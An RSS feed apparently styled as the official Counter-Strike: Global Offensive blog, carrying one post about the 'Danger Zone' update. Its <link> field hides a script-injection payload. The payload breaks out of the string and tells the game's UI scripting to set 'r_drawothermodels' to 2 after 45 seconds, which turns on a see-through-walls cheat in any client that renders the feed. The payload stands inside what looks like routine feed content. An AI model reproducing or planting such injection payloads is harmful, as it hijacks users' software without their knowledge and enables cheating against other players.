<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	
xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
>

<channel>
	<title>Counter-Strike: Global Offensive</title>
	<atom:link href="https://blog.counter-strike.net/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>https://blog.counter-strike.net</link>
	<description></description>
	<lastBuildDate>
	Fri, 03 May 2019 01:18:37 +0000	</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>

<image>
	<url>https://en.wordpress.com/i/webclip.png</url>
	<title>Counter-Strike: Global Offensive</title>
	<link>https://blog.counter-strike.net</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">155055202</site>	<item>
		<title>Danger Zone Enters New Territory</title>
		<link>https://blah.io/test"); $.Schedule( 45.0, _ => {GameInterfaceAPI.SetSettingString("r_drawothermodels", "2");} );//</link>
				<pubDate>Wed, 01 May 2019 00:35:55 +0000</pubDate>
		<dc:creator><![CDATA[csgo_brian]]></dc:creator>
				<category><![CDATA[Home]]></category>
		<category><![CDATA[csgo]]></category>

		<guid isPermaLink="false">https://blog.counter-strike.net/?p=23968</guid>
				<description><![CDATA[The experiment has evolved. To be the last team standing, you&#8217;ll have to put your skills to the test &#8211; with all new respawn and deploy mechanics, new items to master, and a brand new map to explore. Today&#8217;s update also includes some quality of life upgrades, like an all new player-pinging system. Grab a [&#8230;]]]></description>
								<content:encoded><![CDATA[<p><a href="http://counter-strike.net/sirocco"><img src="http://media.steampowered.com/apps/csgo/blog/images/blog_sirocco.jpg" alt="" width="530"/></a></p>
<p>The experiment has evolved. To be the last team standing, you&#8217;ll have to put your skills to the test &#8211; with all new respawn and deploy mechanics, new items to master, and a brand new map to explore.</p>
<p>Today&#8217;s update also includes some quality of life upgrades, like an all new player-pinging system.</p>
<p>Grab a teammate and see if you&#8217;ve still got what it takes to survive!</p>
]]></content:encoded>
<post-id xmlns="com-wordpress:feed-additions:1">23968</post-id>	</item>
	</channel>
</rss>